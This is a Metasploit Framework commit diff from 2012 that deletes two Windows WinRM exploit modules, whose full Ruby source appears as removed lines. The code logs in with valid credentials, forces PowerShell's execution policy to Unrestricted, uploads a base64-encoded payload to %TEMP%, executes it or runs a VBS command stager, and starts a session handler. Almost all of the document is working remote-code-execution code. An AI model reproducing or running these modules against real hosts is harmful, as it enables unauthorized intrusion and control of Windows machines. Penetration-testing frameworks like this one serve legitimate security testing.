Remove the older modules

2012-11-04 14:48:34 -06:00 · 2012-11-04 14:48:34 -06:00 · 25a6e983a1
parent fca8208171
commit 25a6e983a1
2 changed files with 0 additions and 263 deletions
--- a/modules/exploits/windows/winrm/winrm_powershell.rb
+++ b/modules/exploits/windows/winrm/winrm_powershell.rb
@ -1,177 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = ManualRanking
-
-	include Msf::Exploit::Remote::WinRM
-
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'WinRM Powershell Remote Code Execution',
-			'Description'    => %q{
-					This module uses valid credentials to login to the WinRM service
-					and execute a payload as a powershell script. It then attempts to
-					automigrate before the WinRS shell dies.
-
-					It is important to use an x64 payload if your target system is x64.
-					The target machine must be running Powershell 2.0 for the payload 
-					to work. 
-			},
-			'Author'         => [ 'thelightcosine' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'Privileged'     => true,
-			'DefaultOptions' =>
-				{
-					'WfsDelay'     => 30,
-					'EXITFUNC' => 'thread',
-					'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
-				},
-			'Platform'       => 'win',
-			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
-			'Targets'        =>
-				[
-					[ 'Windows with Powershell 2.0', { } ],
-				],
-			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'Nov 01 2012'
-		))
-
-	end
-
-	def check
-		unless accepts_ntlm_auth
-			print_error "The Remote WinRM  server  does not appear to allow Negotiate(NTLM) auth"
-			return Msf::Exploit::CheckCode::Safe
-		end
-
-		print_status "checking for Powershell 2.0"
-		streams = winrm_run_cmd("powershell Get-Host")
-		if streams == 401
-			print_error "Login failed!"
-			return Msf::Exploit::CheckCode::Safe
-		end
-		unless streams.class == Hash 
-			print_error "Recieved error while running check"
-			return Msf::Exploit::CheckCode::Safe
-		end
-		streams['stdout'].each_line do |line|
-			next unless line.start_with? "Version"
-			major_version = line.match(/\d(?=\.)/)[0]
-			if major_version == 1
-				print_error "The target is running an older version of powershell"
-				return Msf::Exploit::CheckCode::Safe
-			end
-		end
-
-		print_status "Attempting to set Execution Policy"
-		streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
-		if streams == 401
-			print_error "Login failed!"
-			return Msf::Exploit::CheckCode::Safe
-		end
-		unless streams.class == Hash 
-			print_error "Recieved error while running check"
-			return Msf::Exploit::CheckCode::Safe
-		end
-		streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
-		if streams['stdout'].include? 'Unrestricted'
-			return Msf::Exploit::CheckCode::Vulnerable
-		else
-			unless streams['stderr'] == ''
-				print_error streams['stderr']
-			end
-			return Msf::Exploit::CheckCode::Safe
-		end
-	end
-
-	def exploit
-		unless  check == Msf::Exploit::CheckCode::Vulnerable
-			print_error "Unable to set Execution Policy"
-			return
-		end
-		path = upload_script
-		return if path.nil?
-		exec_script(path)
-		handler
-	end
-
-	def upload_script
-		tdir = temp_dir
-		return if tdir.nil?
-		path = tdir + "\\" + ::Rex::Text.rand_text_alpha(8) + ".ps1"
-		print_status "Uploading powershell script to #{path} (This may take a few minutes)..."
-
-		script = Msf::Util::EXE.to_win32pe_psh(framework,payload.encoded)
-		#add a sleep to the script to give us enoguh time to establish a session
-		script << "\n Start-Sleep -s 600"
-		script.each_line do |psline|
-			#build our psh command to write out our psh script, meta eh?
-			script_line = "Add-Content #{path} '#{psline.chomp}' "
-			cmd = encoded_psh(script_line)
-			streams = winrm_run_cmd(cmd)
-		end
-		return path
-	end
-
-	def exec_script(path)
-		print_status "Attempting to execute script..."
-		cmd = "powershell -File #{path}"
-		resp,c = send_request_ntlm(winrm_open_shell_msg)
-		if resp.nil?
-			print_error "Got no reply from target"
-			return
-		end
-		unless resp.code == 200
-			print_error "Got unexpected response from #{ip}: \n #{resp.to_s}"
-			return
-		end
-		shell_id = winrm_get_shell_id(resp)
-		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
-		cmd_id = winrm_get_cmd_id(resp)
-		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
-		streams = winrm_get_cmd_streams(resp)
-	end
-
-	def encoded_psh(script)
-		script = script.chars.to_a.join("\x00").chomp
-		script << "\x00" unless script[-1].eql? "\x00"
-		script = Rex::Text.encode_base64(script).chomp
-		cmd = "powershell -encodedCommand #{script}"
-	end
-
-	def temp_dir
-		print_status "Grabbing %TEMP%"
-		resp,c = send_request_ntlm(winrm_open_shell_msg)
-		if resp.nil?
-			print_error "Got no reply from the server"
-			return nil
-		end
-		unless resp.code == 200
-			print_error "Got unexpected response: \n #{resp.to_s}"
-			return nil
-		end
-		shell_id = winrm_get_shell_id(resp)
-		cmd = "echo %TEMP%"
-		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
-		cmd_id = winrm_get_cmd_id(resp)
-		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
-		streams = winrm_get_cmd_streams(resp)
-		return streams['stdout'].chomp
-	end
-
-end
--- a/modules/exploits/windows/winrm/winrm_vbsl.rb
+++ b/modules/exploits/windows/winrm/winrm_vbsl.rb
@ -1,86 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = ManualRanking
-
-	include Msf::Exploit::Remote::WinRM
-	include Msf::Exploit::CmdStagerVBS
-
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'WinRM VBS Remote Code Execution',
-			'Description'    => %q{
-					This module uses valid credentials to login to the WinRM service
-					and execute a VBS cmdstager.
-			},
-			'Author'         => [ 'thelightcosine' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'Privileged'     => true,
-			'DefaultOptions' =>
-				{
-					'WfsDelay'     => 30,
-					'EXITFUNC' => 'thread',
-					'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
-				},
-			'Platform'       => 'win',
-			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
-			'Targets'        =>
-				[
-					[ 'Windows', { } ],
-				],
-			'DefaultTarget'  => 0,
-			'DisclosureDate' => 'Nov 01 2012'
-		))
-
-		register_advanced_options(
-		[
-			OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
-				File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")]),
-		], self.class)
-
-	end
-
-	def check
-		unless accepts_ntlm_auth
-			print_error "The Remote WinRM  server  does not appear to allow Negotiate(NTLM) auth"
-			return Msf::Exploit::CheckCode::Safe
-		end
-	end
-
-
-	def exploit
-		execute_cmdstager
-		handler
-	end
-
-	def execute_command(cmd,opts)
-		commands = cmd.split(/&/)
-		commands.each do |command|
-			if command.include? "cscript"
-				streams = winrm_run_cmd_hanging(command)
-				print_status streams.inspect
-			elsif command.include? "del %TEMP%"
-				next
-			else
-				winrm_run_cmd(command)
-			end
-		end
-	end
-
-
-end